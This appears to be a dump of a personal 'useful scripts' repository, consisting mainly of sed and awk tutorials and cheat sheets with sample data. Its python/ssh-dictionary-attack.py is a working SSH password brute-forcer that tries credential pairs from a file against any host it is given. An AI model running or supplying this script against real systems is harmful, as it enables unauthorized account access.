67 | Out[64]: array([4, 5, 2, 5]) 68 | 69 | %timeit runs_of_ones_array(xx) 70 | 10000 loops, best of 3: 28.5 µs per loop 71 | 72 | %timeit rle(xx) 73 | 10000 loops, best of 3: 38.2 µs per loop 74 | Slightly slower than Alex (but still very fast), and much more flexible. 75 | ``` 76 | -------------------------------------------------------------------------------- /python/ssh-dictionary-attack.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | import socket 4 | 5 | # Usage 6 | # python3 attack.py [host_name] [login_file] 7 | 8 | # https://github.com/veeral-patel/SSH-Dictionary-Attack 9 | 10 | #It takes the target's host name and a file containing 11 | #usernames and passwords, like this: 12 | 13 | # user1 pass1 14 | # user2 pass2 15 | # user3 pass3 16 | 17 | 18 | if len(sys.argv[1:]) != 2: 19 | print("Exactly 2 arguments required!") 20 | sys.exit() 21 | 22 | # host = "hive22.cs.berkeley.edu" 23 | host = sys.argv[1] 24 | with open(sys.argv[2], 'r') as file: 25 | lines = file.readlines() 26 | 27 | lines = [line.strip("\n") for line in lines] 28 | lst = [tuple(line.split(" ")) for line in lines] 29 | 30 | client = paramiko.SSHClient() 31 | 32 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 33 | 34 | for username, password in lst: 35 | try: 36 | client.connect(host, username=username, password=password) 37 | print("[+] Success! 
", username, " / ", password) 38 | break 39 | except socket.gaierror: 40 | print("invalid host!") 41 | break 42 | except paramiko.AuthenticationException: 43 | print("[-] Failure: ", username, "/", password) 44 | -------------------------------------------------------------------------------- /sed-awk/README.md: -------------------------------------------------------------------------------- 1 | Sed & Awk Programming 2 | ============== 3 | 4 | - [Sed Tutorial](sed_tutorial.md) 5 | 6 | - [Awk Tutorial](awk_tutorial.md) 7 | -------------------------------------------------------------------------------- /sed-awk/awk-workflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/sed-awk/awk-workflow.png -------------------------------------------------------------------------------- /sed-awk/awk_soup: -------------------------------------------------------------------------------- 1 | # 1. print the sum of nth column 2 | awk -F "\t" -n n=1 '{sum+=$n}END{print sum}' file 3 | awk '{sum += $1};END {print sum}' test 4 | 5 | # 2. print all the columns, exclude vth column 6 | awk -F "\t" -v v=3 '{ 7 | len=split($0,arr,"\t"); 8 | for(i=1;i$v?max:$v;min=min<$v?min:$v}END{print max,min}' file 18 | 19 | # 4. display all different values in one column 20 | awk -v v=1 'BEGIN{FS="\t"}{a[$v]=1;sum=0} END{for(i in a) sum+=a[i];print sum}' file 21 | 22 | # 5. delete the repeated row 23 | awk '!a[$0]++' file 24 | awk '!a[$0]++' tmp > tmp1 25 | 26 | # 6. matrix transposition 27 | awk -F "\t" '{for(i=1;i<=NF;i++){a[FNR,i]=$i}}END{for(i=1;i<=NF;i++){for(j=1;j<=FNR;j++){printf a[j,i]"\t"}print ""}}' file | sed 's/[ \t]*$//' | sed '$d' 28 | 29 | # 7. delete the last row in the file 30 | sed '$d' file.txt 31 | 32 | # 8. delete the white space in the tail 33 | sed 's/[ \t]*$//' lr_predict_tmp > lr_predict_tmp1 34 | sed 's/[ \t]*$//' tmp3 > test2 35 | 36 | # 9. 
set empty fields to 0 37 | awk -F "\t" '{for (i=1;i<=NF;i++) if($i=="") $i=0; print $0}' OFS="\t" tt > tt2 38 | 39 | # 10. merge the columns of the same session 40 | awk 'BEGIN{FS=" "} {map[$1]=map[$1]$NF" "} END{for(i in map)print i,map[i]}' tmp1 > tmp2 41 | #awk 'BEGIN{FS=OFS=" "} {map[$1]=map[$1]$NF" "} END{for(i in map)print i,map[i]}' tmp > tmp1 42 | 43 | # 11. compare src with lr_predict, and get the intersection 44 | awk 'NR==FNR{a[$0]++} NR>FNR&&a[$0]' src lr_predict > lr_predict_output 45 | # src2 46 | # s1 A B 47 | # s1 A C 48 | # s1 A E 49 | # s2 B D 50 | # s2 B E 51 | # s2 B F 52 | # s3 A B 53 | # s3 A D 54 | # s4 E A 55 | # predict 56 | # A B 57 | # A C 58 | # A D 59 | # B C 60 | # B D 61 | # C E 62 | # C F 63 | # C G 64 | awk 'NR==FNR{a[$1,$2]=1} NR>FNR&&a[$2,$3]' lr_predict src2 > lr_predict_output2 65 | 66 | -------------------------------------------------------------------------------- /sed-awk/awk_tutorial.md: -------------------------------------------------------------------------------- 1 | 2 | # Awk Tutorial 3 | ============== 4 | 5 | - [Awk Syntax and Basic Commands](#awk-syntax-and-basic-commands) 6 | - [Awk Built-in Variables](#awk-built-in-variables) 7 | - [Awk Variables and Operators](#awk-variables-and-operators) 8 | - [Awk Conditional Statements and Loops](#awk-conditional-statements-and-loops) 9 | - [Awk Associative Arrays](#awk-associative-arrays) 10 | - [Additional Awk Commands](#additional-awk-commands) 11 | - [AWK Cheat Sheet](https://github.com/pkrumins/awk-cheat-sheet/blob/master/awk.cheat.sheet.txt) 12 |
14 |
15 |
16 | 17 | ### Awk Syntax and Basic Commands 18 | 19 | [[back to top](#awk-tutorial)] 20 | 21 | Awk is a powerful language for manipulating and processing text files. It is especially helpful when the lines in a text file are in a record format, i.e., when each line (record) contains multiple fields separated by a delimiter. 22 | 23 | #### 1. Awk Command Syntax 24 | 25 | **Basic Awk Syntax:** 26 | 27 | ```awk 28 | awk -Fs '/pattern/ {action}' input-file 29 | (or) 30 | awk -Fs '{action}' input-file 31 | ``` 32 | 33 | - **F** is the field separator. If you don't specify one, awk uses whitespace as the field delimiter. 34 | 35 | - The `/pattern/` and the `{action}` should be enclosed inside single quotes. 36 | 37 | - `/pattern/` is optional. If you specify a pattern, awk will process only those records from the input-file that match the given pattern. If you don't, it will process all the records from the input-file. 38 | 39 | - `{action}` can be one or multiple awk commands. 40 | 41 | - input-file is the file to be processed. 42 | 43 | ```awk 44 | $ awk -F: '/mail/ {print $1}' /etc/passwd 45 | $ awk -F ":" '/mail/ {print $1}' /etc/passwd 46 | ``` 47 | 48 | - **-F:** or **-F ":"** indicates that the field separator in the input-file is the colon :. 49 | 50 | - /mail/, awk will process only the records that contain the keyword mail. 51 | 52 | - {print $1}, this action block contains only one awk command, which prints the 1st field of each record that matches the pattern "mail". 53 | 54 | - /etc/passwd - the input file. 55 | 56 | You can also put awk commands in an awk script file: 57 | 58 | ``` 59 | awk -Fs -f myscript.awk input-file 60 | ``` 61 | 62 | #### 2. Awk Program Structure 63 | 64 | A typical awk program has the following three blocks: BEGIN, body and END.
65 | 66 | - BEGIN Block (optional) 67 | 68 | ``` 69 | BEGIN {awk-commands} 70 | ``` 71 | 72 | The begin block gets executed only once at the beginning, before awk starts executing the body block for the lines in the input file. 73 | 74 | - The begin block is a good place to print report headers and initialize variables. 75 | 76 | - You can have one or more awk commands in the begin block. 77 | 78 | - Body Block 79 | 80 | ``` 81 | /pattern/ {action} 82 | ``` 83 | 84 | The body block gets executed once for every line in the input file, e.g., if the input file has 10 records, the commands in the body block will be executed 10 times. 85 | 86 | - END Block 87 | 88 | ``` 89 | END {awk-commands} 90 | ``` 91 | 92 | The end block gets executed only once at the end, after awk completes executing the body block for all the lines in the input-file. 93 | 94 | - The end block is a good place to print a report footer and do any clean-up activities. 95 | 96 | - You can have one or more awk commands in the end block. 97 | 98 | ![](awk-workflow.png) 99 | 100 | Image Source: Sed and Awk 101 Hacks 101 | 102 | For example: 103 | 104 | ``` 105 | $ awk 'BEGIN { FS=":"; print "---header---"} /mail/ {print $1} END { print "---footer---"}' /etc/passwd 106 | ``` 107 | 108 | You can also run the same commands from a script file: 109 | 110 | ``` 111 | $ vi test.awk 112 | BEGIN { 113 | FS=":"; 114 | print "---header---" 115 | } 116 | /mail/ { 117 | print $1 118 | } 119 | END { 120 | print "---footer---" 121 | } 122 | ``` 123 | 124 | ``` 125 | $ awk -f test.awk /etc/passwd 126 | ``` 127 | 128 | #### 3. Print Command 129 | 130 | By default, the awk print command prints the full record; it is equivalent to the `cat` command.
131 | 132 | ``` 133 | $ awk '{print}' titanic.txt 134 | 135 | # PassengerId Survived Pclass Name Sex Age SibSp Parch Ticket Fare Cabin Embarked 136 | 137 | # show all lines ($0 is the full record) 138 | awk '{print $0}' titanic.txt 139 | 140 | # show name and age 141 | awk '{print $4, $6}' titanic.txt 142 | 143 | # field number 4 indicates: Name 144 | $ awk '{print $4 }' titanic.txt 145 | ``` 146 | 147 | #### 4. Pattern Matching 148 | 149 | ```awk 150 | # print the names and sex 151 | $ awk '/male/ {print $4, $5}' titanic.txt 152 | 153 | # print name and sex for Ids starting with 1 154 | awk '/^1/ {print $4,"\t", $5}' titanic.txt 155 | 156 | # select the rows whose name contains William 157 | awk '/William/{print $0}' titanic.txt 158 | 159 | # select the rows with age <= 30 160 | awk '$6<=30{print $0}' titanic.txt 161 | 162 | # regex: Ids starting with 10 to 13 163 | awk '/^1[0-3]/{print $0}' titanic.txt 164 | ``` 165 |
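For readers more comfortable in Python, awk's record/field/pattern model used in the examples above can be emulated in a few lines. The sample records below are hypothetical stand-ins for titanic.txt rows; fields are 1-based, as in awk:

```python
import re

def awk_like(lines, pattern, fields):
    """For each whitespace-split record matching `pattern`, collect the
    requested 1-based fields (roughly awk's '/pattern/ {print $a, $b}')."""
    out = []
    for line in lines:
        if re.search(pattern, line):
            parts = line.split()  # default FS: whitespace
            out.append(" ".join(parts[f - 1] for f in fields))
    return out

# hypothetical records: Id Survived Pclass Name Sex Age
records = [
    "1 0 3 Braund male 22",
    "2 1 1 Cumings female 38",
    "10 1 2 Nasser female 14",
]
print(awk_like(records, r"female", [4, 5]))  # ['Cumings female', 'Nasser female']
```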
167 |
168 |
169 | 
170 | ### Awk Built-in Variables
171 | 
172 | [[back to top](#awk-tutorial)]
173 | 
174 | #### 1. FS - Input Field Separator
175 | 
176 | The default field separator recognized by awk is whitespace (spaces and tabs).
177 | 
178 | ```awk
179 | $ awk -F ',' '{print $1, $2}' items.txt
180 | 
181 | $ awk 'BEGIN {FS=","} {print $1, $2}' items.txt
182 | 
183 | $ awk 'BEGIN {FS=","; \
184 | print "--------\nID\tItem\n--------"} \
185 | {print $1,"\t",$2} \
186 | END {print "--------"}' items.txt
187 | ```
188 | 
189 | When a file contains different field separators, you can specify multiple field separators using a regular expression.
190 | 
191 | ```awk
192 | $ awk 'BEGIN {FS="[,:@]"} {print $1, $2, $5}' items.txt
193 | ```
194 | 
195 | #### 2. OFS - Output Field Separator
196 | 
197 | OFS is printed between consecutive fields in the output. By default, OFS is a single space.
198 | 
199 | ```awk
200 | $ awk -F ',' '{print $1, ":", $2}' items.txt
201 | 
202 | $ awk -F ',' 'BEGIN { OFS=":"} { print $2, $3 }' items.txt
203 | ```
204 | 
205 | #### 3. RS - Record Separator
206 | 
207 | The default record separator used by awk is the newline.
208 | 
209 | ```awk
210 | $ awk -F ',' 'BEGIN { RS="@"} { print }' items.txt
211 | 
212 | $ awk -F ',' 'BEGIN { RS="@"} { print $1 }' items.txt
213 | ```
214 | 
215 | #### 4. ORS - Output Record Separator
216 | 
217 | ```awk
218 | $ awk 'BEGIN {FS="[,:@]"; ORS="\n---\n"} {print $1, $2, $5}' items.txt
219 | 
220 | $ awk 'BEGIN {FS="[,:@]"; OFS="\n"; ORS="\n---\n"} {print $1, $2, $5}' items.txt
221 | ```
222 | 
223 | #### 5. NR - Number of Records
224 | 
225 | When NR is used inside the body block, it gives the current line number. When used in the END block, it gives the total number of records in the file.
226 | 
227 | ```awk
228 | $ awk 'BEGIN {FS=","} \
229 | {print "Item Id of record number", NR, "is", $1;} \
230 | END {print "Total number of records:", NR}' items.txt
231 | ```
232 | 
233 | #### 6. FILENAME - Current File Name
234 | 
235 | This will give you the name of the file awk is currently processing.
236 | 
237 | FILENAME inside the BEGIN block will return the empty value "", as the BEGIN block is for the whole awk program, and not for any specific file.
238 | 
239 | ```awk
240 | $ awk 'BEGIN {FS=","} {print "Item:", $2; print "Filename:", FILENAME}' items.txt
241 | 
242 | # it will return an empty value in this example
243 | $ echo "John Smith" | awk '{print "Last name:", $2; \
244 | print "Filename:", FILENAME}'
245 | ```
246 | 
247 | #### 7. FNR - File "Number of Record"
248 | 
249 | When you have two input files, NR keeps growing across the files. When the body block starts processing the 2nd file, NR is not reset to 1; instead it continues from the last NR value of the previous file.
250 | 
251 | ```awk
252 | # copy the file to test
253 | $ cp items.txt items-1.txt
254 | 
255 | # each file has 5 records; NR continues incrementing after the 1st file is processed.
256 | $ awk 'BEGIN {FS=","} \
257 | {print FILENAME ": Record Number", NR, "is", $1} \
258 | END {print "Total number of records:",NR}' items.txt items-1.txt
259 | 
260 | # FNR will give you the record number within the current file.
261 | # When awk starts the body block on the 2nd file, FNR starts from 1 again
262 | $ awk 'BEGIN {FS=","} \
263 | {print FILENAME ": Record Number", FNR, "is", $1} \
264 | END {print "Total number of records:",NR}' items.txt items-1.txt
265 | ```
266 | 
267 |
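A common use of FNR (not covered above) is the `NR==FNR` idiom, which is true only while awk is reading the first input file. This is a minimal sketch, reusing the items.txt/items-1.txt pair created above, that prints the Ids appearing in both files:

```awk
# NR==FNR holds only for the 1st file: remember its Ids there,
# then for the 2nd file print any Id that was already seen
$ awk -F ',' 'NR==FNR { seen[$1]=1; next } ($1 in seen) { print $1 }' items.txt items-1.txt
```

Since items-1.txt is a copy of items.txt, this prints all five Ids; with two different files it prints only the common ones.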
268 |
269 |
270 | 
271 | ### Awk Variables and Operators
272 | 
273 | [[back to top](#awk-tutorial)]
274 | 
275 | #### 1. Variables
276 | 
277 | ```awk
278 | $ cat variables.awk
279 | BEGIN {
280 | FS="[,:@]"
281 | total=0;
282 | }
283 | {
284 | print $2 "'s price is: " $4;
285 | total=total+$4
286 | }
287 | END {
288 | print "---\nTotal price = $"total;
289 | }
290 | 
291 | $ awk -f variables.awk items.txt
292 | ```
293 | 
294 | #### 2. Operators
295 | 
296 | - **+**: Unary plus (returns the number itself)
297 | - **-**: Negate the number
298 | - **++**: Auto Increment
299 | - **--**: Auto Decrement
300 | 
301 | e.g., `++$2`, `$2++`
302 | 
303 | Pre-increment (or pre-decrement) places ++ (or --) before the variable name. This first increases (or decreases) the value of the variable by one, and then executes the rest of the statement in which it is used.
304 | 
305 | Post-increment (or post-decrement) places ++ (or --) after the variable name. This first executes the containing statement and then increases (or decreases) the value of the variable by one.
306 | 
307 | ```awk
308 | # print the number of shell users
309 | $ awk -F ':' '$NF ~ /\/bin\/bash/ { n++ }; END { print n }' /etc/passwd
310 | 
311 | # print all the even numbered lines
312 | $ awk 'NR % 2 == 0' items.txt
313 | 
314 | # print the average age
315 | $ awk '{age+=$6};END{print age/(NR-1)}' titanic.txt
316 | 
317 | # find the minimal value of field 10 (Fare)
318 | $ awk 'NR==2{min=$10} {if($10<min) min=$10} END{print min}' titanic.txt
319 | 
320 | # save the passenger Id and age to a file
321 | $ awk '{print $1, $6}' titanic.txt > pID_age.txt
322 | ```
323 | 
324 | - Regular Expression Operators
325 | 
326 | **~** Match operator (matches the regular expression anywhere in the field, not a full match)
327 | 
328 | **==** Full match (exact comparison of the whole field)
329 | 
330 | **!~** No Match operator
331 | 
332 | ```awk
333 | $ awk -F "," '$2 ~ "iPhone"' items.txt
334 | $ awk -F "," '$2 == "iPhone"' items.txt
335 | ```
336 | 
337 |
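The pre/post difference described above is easiest to see in a BEGIN-only one-liner (a minimal sketch; the variable x is arbitrary):

```awk
# pre-increment: x is increased first, then its value is used
$ awk 'BEGIN { x=5; print ++x }'
6

# post-increment: the old value is used, then x is increased
$ awk 'BEGIN { x=5; print x++ }'
5

# either way, x ends up as 6 afterwards
$ awk 'BEGIN { x=5; x++; print x }'
6
```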
338 |
339 |
340 | 341 | ### Awk Conditional Statements and Loops 342 | 343 | [[back to top](#awk-tutorial)] 344 | 345 | #### 1. If Statement 346 | 347 | ``` 348 | if (conditional-expression) 349 | { 350 | action1; 351 | action2; 352 | } 353 | ``` 354 | 355 | ```awk 356 | $ awk 'BEGIN {FS="[,:@]"} \ 357 | {if (($4 >= 300 && $4 <= 800) && ($5 <= 10)) \ 358 | print "Only", $5, "qty of",$2, "is available";}' items.txt 359 | ``` 360 | 361 | ``` 362 | if (conditional-expression) 363 | action1 364 | else 365 | action2 366 | ``` 367 | 368 | Ternary Operator Syntax: 369 | 370 | ``` 371 | conditional-expression ? action1 : action2 ; 372 | ``` 373 | 374 | ```awk 375 | # print concatenated pairs of records 376 | $ awk 'ORS=NR%2? ",":"\n"' items.txt 377 | ``` 378 | 379 | #### 2. While Loop 380 | 381 | ```awk 382 | $ awk 'BEGIN \ 383 | { while (count++<50) string = string "x"; print string }' 384 | ``` 385 | 386 | ```awk 387 | $ awk 'BEGIN{ 388 | count=1; 389 | do 390 | print "This gets printed at least once"; 391 | while(count!=1) 392 | }' 393 | ``` 394 | 395 | #### 3. For Loop 396 | 397 | ```awk 398 | $ echo "1 2 3 4" | awk \ 399 | '{for (i=1; i <= NF; i++) total = total+$i }; \ 400 | END { print total }' 401 | ``` 402 | - Continue Statement 403 | 404 | ```awk 405 | $ awk 'BEGIN { x=1; 406 | while(x<=10) { 407 | if (x==5) { 408 | x++; 409 | continue; 410 | } 411 | print "Value of x", x; x++; 412 | } 413 | }' 414 | ``` 415 | 416 | - Exit Statement 417 | 418 | ```awk 419 | $ awk 'BEGIN { x=1; 420 | while(x<=10) { 421 | if (x==5) { 422 | x++; 423 | exit; 424 | } 425 | print "Value of x", x; x++; 426 | } 427 | }' 428 | ``` 429 | 430 |
431 |
432 |
433 | 
434 | ### Awk Associative Arrays
435 | 
436 | [[back to top](#awk-tutorial)]
437 | 
438 | #### 1. Assigning Array Elements
439 | 
440 | ```awk
441 | $ cat arrays.awk
442 | BEGIN {
443 | item[101]="iPhone 6";
444 | item[102]="MacBook Air";
445 | item["na"]="Not Available";
446 | 
447 | for (x in item)
448 | print item[x];
449 | }
450 | 
451 | $ awk -f arrays.awk
452 | ```
453 | 
454 | #### 2. Multi Dimensional Array
455 | 
456 | ```awk
457 | $ cat multi-array.awk
458 | BEGIN {
459 | item["1,1"]=10;
460 | item["1,2"]=20;
461 | item["2,1"]=30;
462 | item["2,2"]=40;
463 | 
464 | for (x in item)
465 | print item[x];
466 | }
467 | 
468 | $ awk -f multi-array.awk
469 | ```
470 |
471 |
472 |
473 | 
474 | ### Additional Awk Commands
475 | 
476 | [[back to top](#awk-tutorial)]
477 | 
478 | #### 1. printf
479 | 
480 | ```awk
481 | # new line
482 | $ awk 'BEGIN { printf "Line 1\nLine 2\n" }'
483 | # tab
484 | $ awk 'BEGIN \
485 | { printf "Field 1\tField 2\tField 3\tField 4\n"}'
486 | # vertical tab
487 | $ awk 'BEGIN \
488 | { printf "Field 1\vField 2\vField 3\vField 4\n"}'
489 | # backspace
490 | $ awk 'BEGIN \
491 | { printf "Field 1\bField 2\bField 3\bField 4\n"}'
492 | # carriage return
493 | $ awk 'BEGIN \
494 | { printf "Field 1\rField 2\rField 3\rField 4\n"}'
495 | ```
496 | 
497 | #### 2. Argument Processing
498 | 
499 | ```awk
500 | $ cat arguments.awk
501 | BEGIN {
502 | print "ARGC=",ARGC
503 | for (i = 0; i < ARGC; i++)
504 | print ARGV[i]
505 | }
506 | 
507 | $ awk -f arguments.awk arg1 arg2 arg3 arg4
508 | ```
509 | 
510 |
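Besides the escape sequences shown above, printf also accepts the usual C-style format specifiers (this is standard awk, just not covered by the escape-sequence examples); a quick sketch:

```awk
# %-10s left-justified string, %5d right-aligned integer, %8.2f fixed-point
$ awk 'BEGIN { printf "%-10s %5d %8.2f\n", "iPhone", 20, 700 }'
iPhone        20   700.00
```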
511 |
512 |
513 | 514 | ### Reference 515 | 516 | * [Sed-and-Awk-101-Hacks](https://www.yumpu.com/en/document/view/25827537/sed-and-awk-101-hacks) 517 | -------------------------------------------------------------------------------- /sed-awk/items.txt: -------------------------------------------------------------------------------- 1 | 101,MacBook Air,PC,810@10 2 | 102,Refrigerator,Appliance,900@5 3 | 103,iPhone 7,Phone,700@20 4 | 104,Laser Printer,Office,300@8 5 | 105,Football,Sports,200@15 6 | -------------------------------------------------------------------------------- /sed-awk/sed_tutorial.md: -------------------------------------------------------------------------------- 1 | 2 | # Sed Tutorial 3 | ============== 4 | 5 | - [Sed Syntax](#sed-syntax) 6 | - [Sed Substitute Command](#sed-substitute-command) 7 | - [Regular Expressions](#regular-expressions) 8 | 9 |
10 |
11 |
12 | 
13 | ### Sed Syntax
14 | 
15 | [[back to top](#sed-tutorial)]
16 | 
17 | #### 1. Sed Command Syntax
18 | 
19 | Sed stands for Stream Editor. It is a powerful tool to manipulate, filter, and transform text.
20 | 
21 | **Basic sed syntax:**
22 | 
23 | ```shell
24 | sed [options] {sed-commands} {input-file}
25 | ```
26 | 
27 | For example, the following prints all the lines from the /etc/passwd file:
28 | 
29 | ```shell
30 | $ sed -n 'p' /etc/passwd
31 | 
32 | $ cat test.sed
33 | /^root/ p
34 | /^nobody/ p
35 | $ sed -n -f test.sed /etc/passwd
36 | 
37 | $ sed -n -e '/^root/ p' -e '/^nobody/ p' /etc/passwd
38 | 
39 | $ sed -n '{
40 | /^root/ p
41 | /^nobody/ p
42 | }' /etc/passwd
43 | ```
44 | 
45 | #### 2. Print Pattern Space (p command)
46 | 
47 | When p is used, you should also use the -n option to suppress the default printing; otherwise, when p is executed as one of the commands, matching lines will be printed twice.
48 | 
49 | ```shell
50 | # functionally the same as: cat titanic.txt
51 | $ sed -n 'p' titanic.txt
52 | 
53 | # print only the 2nd line:
54 | $ sed -n '2 p' titanic.txt
55 | 
56 | # print from line 1 through line 4:
57 | $ sed -n '1,4 p' titanic.txt
58 | 
59 | # print from line 2 through the last line:
60 | $ sed -n '2,$ p' titanic.txt
61 | 
62 | # print lines matching the pattern: William
63 | $ sed -n '/William/ p' titanic.txt
64 | ```
65 | 
66 | #### 3. Delete Lines (d command)
67 | 
68 | Using the sed d command, you can delete lines. The lines are only deleted from the output stream; the original input file is not modified.
69 | 
70 | ```shell
71 | # delete only the 2nd line
72 | $ sed '2 d' titanic.txt
73 | 
74 | # delete from line 2 through 4
75 | $ sed '2,4 d' titanic.txt
76 | 
77 | # delete from line 2 through the last line
78 | $ sed '2,$ d' titanic.txt
79 | 
80 | # delete lines matching the pattern "William"
81 | $ sed '/William/ d' titanic.txt
82 | 
83 | # delete all the empty lines from a file
84 | $ sed '/^$/ d' titanic.txt
85 | 
86 | # delete all comment lines (assuming the comments start with #)
87 | $ sed '/^#/ d' titanic.txt
88 | ```
89 | 
90 | #### 4. Write Pattern Space to File (w command)
91 | 
92 | ```shell
93 | # write the content of titanic.txt to output.txt and display it on screen
94 | $ sed 'w output.txt' titanic.txt
95 | 
96 | # write the content of titanic.txt to output.txt but not to the screen
97 | $ sed -n 'w output.txt' titanic.txt
98 | 
99 | # write only the 2nd line
100 | $ sed -n '2 w output.txt' titanic.txt
101 | 
102 | # write lines 1 through 4
103 | $ sed -n '1,4 w output.txt' titanic.txt
104 | 
105 | # write from line 2 through the last line
106 | $ sed -n '2,$ w output.txt' titanic.txt
107 | ```
108 | 
109 |
110 |
111 |
112 | 
113 | ### Sed Substitute Command
114 | 
115 | [[back to top](#sed-tutorial)]
116 | 
117 | #### 1. Sed Substitute Command Syntax
118 | 
119 | The most powerful command in the stream editor is **s**ubstitute.
120 | 
121 | ```shell
122 | sed '[address-range|pattern-range] s/original-string/replacement-string/[substitute-flags]' inputfile
123 | ```
124 | 
125 | - The address-range or pattern-range and the substitute-flags are optional.
126 | - s tells sed to execute the substitute command.
127 | - Note that the original file is not changed.
128 | 
129 | ```shell
130 | # replace the first occurrence of William on each line with Fei:
131 | $ sed 's/William/Fei/' titanic.txt
132 | 
133 | # replace William with Fei only on lines that contain the keyword Allen
134 | $ sed '/Allen/s/William/Fei/' titanic.txt
135 | ```
136 | 
137 | #### 2. Global Flag (g flag)
138 | 
139 | ```shell
140 | # replace the 1st occurrence of lower case a with upper case A
141 | $ sed 's/a/A/' titanic.txt
142 | 
143 | # replace all occurrences of lower case a with upper case A
144 | $ sed 's/a/A/g' titanic.txt
145 | 
146 | # replace the 2nd occurrence of lower case a with upper case A
147 | $ sed 's/a/A/2' titanic.txt
148 | 
149 | # change only the 2nd occurrence of titanic to fei
150 | $ sed 's/titanic/fei/2' titanic.txt
151 | ```
152 | 
153 | #### 3. Print Flag (p flag)
154 | 
155 | When the substitution is successful, it prints the changed line.
156 | 
157 | ```shell
158 | # print only the lines that were changed by the substitute command
159 | $ sed -n 's/William/Fei/p' titanic.txt
160 | 
161 | # change the 2nd occurrence of "titanic" to "fei" and print the result
162 | $ sed -n 's/titanic/fei/2p' titanic.txt
163 | ```
164 | 
165 | #### 4. Write Flag (w flag)
166 | 
167 | When the substitution is successful, it writes the changed line to a file.
168 | 
169 | ```shell
170 | # write only the lines that were changed by the substitute command to output.txt
171 | $ sed -n 's/William/Fei/w output.txt' titanic.txt
172 | 
173 | # change the 2nd occurrence of "titanic" to "fei", write the result to a file, print all lines
174 | $ sed 's/titanic/fei/2w output.txt' titanic.txt
175 | ```
176 | 
177 | #### 5. Ignore Case Flag (i flag)
178 | 
179 | This is available only in GNU sed.
180 | 
181 | The sed substitute flag i stands for ignore case. You can use the i flag to match the original-string in a case-insensitive manner.
182 | 
183 | ```shell
184 | $ sed 's/titanic/fei/i' titanic.txt
185 | ```
186 | 
187 | #### 6. Execute Flag (e flag)
188 | 
189 | This is available only in GNU sed.
190 | 
191 | The sed substitute flag e stands for execute. Using the sed e flag, you can execute whatever is available in the pattern space as a shell command, and the output will be returned to the pattern space.
192 | 
193 | ```shell
194 | $ cat commands.txt
195 | /etc/passwd
196 | /etc/group
197 | 
198 | # add the text "ls -l" in front of every line in commands.txt and print the output
199 | $ sed 's/^/ls -l /' commands.txt
200 | ls -l /etc/passwd
201 | ls -l /etc/group
202 | 
203 | # add the text "ls -l" in front of every line in commands.txt and execute the output
204 | $ sed 's/^/ls -l /e' commands.txt
205 | ```
206 | 
207 | #### 7. Combine Sed Substitution Flags
208 | 
209 | ```shell
210 | # combine the g, p and w flags
211 | $ sed -n 's/titanic/fei/gpw output.txt' titanic.txt
212 | ```
213 | 
214 | #### 8. Sed Substitution Delimiter
215 | 
216 | ```shell
217 | $ vi path.txt
218 | reading /usr/local/bin directory
219 | 
220 | # change /usr/local/bin to /usr/bin using the sed substitute command
221 | $ sed 's/\/usr\/local\/bin/\/usr\/bin/' path.txt
222 | reading /usr/bin directory
223 | 
224 | # Also, | ^ @ or ! can be used as the substitution delimiter
225 | $ sed 's|/usr/local/bin|/usr/bin|' path.txt
226 | $ sed 's^/usr/local/bin^/usr/bin^' path.txt
227 | $ sed 's@/usr/local/bin@/usr/bin@' path.txt
228 | $ sed 's!/usr/local/bin!/usr/bin!' path.txt
229 | ```
230 | 
231 | #### 9. Multiple Substitute Commands Affecting the Same Line
232 | 
233 | ```shell
234 | # change William to Fei Bird, then change Fei to Ken:
235 | $ sed '{
236 | s/William/Fei Bird/
237 | s/Fei/Ken/
238 | }' titanic.txt
239 | ```
240 | 
241 | The sed execution flow:
242 | 
243 | 1). Read: Sed reads the line and puts it in the pattern space.
244 | 
245 | 2). Execute: Sed executes each command on the content of the current pattern space; the 2nd command operates on the result of the 1st.
246 | 
247 | 3). Print: Sed prints the content of the current pattern space.
248 | 
249 | 4). Repeat: Sed moves on to the next line and repeats from step 1).
250 | 
251 | #### 10. Power of & - Get Matched Pattern
252 | 
253 | ```shell
254 | # enclose the Id between [ and ], i.e. 01 becomes [01], 02 becomes [02], etc.
255 | $ sed 's/^[0-9][0-9]/[&]/g' titanic.txt
256 | 
257 | # enclose the whole input line between < and >
258 | $ sed 's/^.*/<&>/' titanic.txt
259 | ```
260 | 
261 | #### 11. Substitution Grouping
262 | 
263 | ```shell
264 | # this sed example displays only the first field from the /etc/passwd file,
265 | # \([^:]*\) matches the string up to the 1st colon,
266 | # \1 in the replacement-string replaces the first matched group, i.e. it displays only the username:
267 | $ sed 's/\([^:]*\).*/\1/' /etc/passwd
268 | 
269 | # enclose the 1st letter of every word inside (), if that letter is upper case.
270 | $ echo "The Geek Stuff" | sed 's/\([A-Z]\)/\(\1\)/g'
271 | (T)he (G)eek (S)tuff
272 | ```
273 | 
274 | #### 12. Sed Script Files
275 | 
276 | Add "#!/bin/sed -f" as the 1st line of the test.sed file so that the script can be executed directly:
277 | 
278 | ```shell
279 | $ vi test.sed
280 | #!/bin/sed -f
281 | # enclose the whole input line between < and >
282 | s/^.*/<&>/
283 | # replace William with Fei Bird
284 | s/William/Fei Bird/
285 | # replace Fei with Ken
286 | s/Fei/Ken/
287 | ```
288 | 
289 | ```
290 | $ chmod u+x test.sed
291 | $ ./test.sed titanic.txt
292 | ```
293 | 
294 | #### 13. Modifying the Input File Directly
295 | 
296 | ```shell
297 | $ sed 's/William/Fei/' titanic.txt > new-titanic.txt
298 | $ mv new-titanic.txt titanic.txt
299 | 
300 | # Or use the sed command line option -i
301 | $ sed -i 's/William/Fei/' titanic.txt
302 | 
303 | # With a suffix, sed makes a backup (titanic.txt.bak) of the original file before writing the new content
304 | $ sed -i.bak 's/William/Fei/' titanic.txt
305 | ```
306 | 
307 |
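With GNU sed, giving -i a suffix (e.g. -i.bak) keeps a backup copy of the original file next to the edited one. A quick sketch with a throwaway file (the name demo.txt is arbitrary):

```shell
# create a small file, edit it in place, and keep a .bak backup
$ printf 'hello William\n' > demo.txt
$ sed -i.bak 's/William/Fei/' demo.txt
$ cat demo.txt
hello Fei
$ cat demo.txt.bak
hello William
```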
308 |
309 |
310 | 
311 | 
312 | ### Regular Expressions
313 | 
314 | [[back to top](#sed-tutorial)]
315 | 
316 | #### 1. Fundamentals
317 | 
318 | - Beginning of line (^)
319 | - End of line ($)
320 | - Single Character (.)
321 | - Zero or more Occurrences (*)
322 | - One or more Occurrences (\+)
